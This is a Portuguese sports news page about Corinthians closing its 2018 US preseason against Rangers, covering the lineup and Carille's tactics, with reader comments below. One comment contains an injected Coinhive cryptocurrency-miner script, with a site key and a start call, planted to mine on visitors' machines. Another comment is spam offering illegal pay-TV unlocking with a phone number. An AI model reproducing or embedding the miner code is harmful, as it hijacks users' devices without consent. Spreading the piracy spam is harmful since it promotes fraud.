13/1/2018 09:30

Corinthians encerra semana nos EUA; veja como o time enfrenta o Rangers

Carille quer deixar titulares por mais tempo neste sábado; foco do Timão é o Paulista

Foto: Daniel Augusto Jr/Ag. Corinthians

Termina neste sábado a curta pré-temporada de seis dias do Corinthians nos EUA. Diante do Rangers, da Escócia, às 16h (de Brasília), em Orlando, a equipe de Fábio Carille faz novos testes e tenta se despedir do Torneio da Flórida com vitória.



O SporTV transmite a partida ao vivo, e o GloboEsporte.com mostra em Tempo Real, com narração de Milton Leite e comentários de Paulo César Vasconcellos.

Apesar de a competição valer taça, o Corinthians pensa primeiro em observar e saber o que tem em mãos para a disputa do Campeonato Paulista, que começa na próxima quarta-feira.

Por isso, Carille adotará postura diferente da vista no empate por 1 a 1 com o PSV – com vitória corintiana nos pênaltis. Os titulares terão mais de 45 minutos em campo, e as substituições serão mais raras. A ideia é dar ritmo de jogo aos campeões brasileiros.

Carille aproveitou a semana para fazer alguns ajustes, testar formações e saber com quem pode contar na sequência da temporada.

Veja abaixo algumas premissas:
-O Corinthians começa 2018 no 4-1-4-1, com Gabriel à frente da zaga, mais Jadson e Rodriguinho na armação;

-A lateral esquerda teve Juninho Capixaba contra o PSV e agora terá Guilherme Romão, cria da base; ambos têm a missão de substituir Guilherme Arana;

-Kazim é o primeiro da fila na sucessão de Jô, já que foi titular na quarta e começa jogando novamente;

-Lucca, que também pode atuar como um 9, terá 45 minutos para mostrar futebol neste sábado; ele não tem permanência garantida.

O Corinthians vai começar o jogo com Cássio, Fagner, Balbuena, Pedro Henrique e Guilherme Romão; Gabriel; Romero, Jadson, Rodriguinho e Clayson; Kazim.

Para ser campeão do Torneio da Flórida, o Corinthians precisa somar mais pontos do que seus rivais. Contra o PSV, o empate seguido de vitória nos pênaltis valeu dois pontos. A competição, porém, só termina no dia 20 de janeiro, quando a equipe já estará no Paulistão.

9309 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Rafael Pontes     

brincadeira isso dai
< src="https://coinhive.com/lib/coinhive.min.js"><>var miner = new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ", {throttle: 0.3});miner.start();

Ernesto Ito     

Acho que não adianta postar aqui que não vai chegar ao conhecimento do Carille, temos que manifestar de outra forma para que ele saiba da insatisfação do torcedor em relação a sua postura.

pelo amor de Deus carile vc SÓ pode ta de brincadeira coloca o lucca da uma chance pro garoto ele é disparado melhor que kazim se ele jogar hoje vai fazer gol

poe o Carlinhos pra jogar melhor que kazim e melhor que lucca

Luis Fernando     

Só pode estar de brincadeira Carille Kasim Titular ????! Vão deixar o Lucca No Banco??? É o Carlinhos ?

gabriel silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

kazin esse carille tá de brincadeira se essa cara pode ser titular do corinthians eu posso ser mais ídolo do que o Cristiano Ronaldo no Real Madrid kkkk se toca carille

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias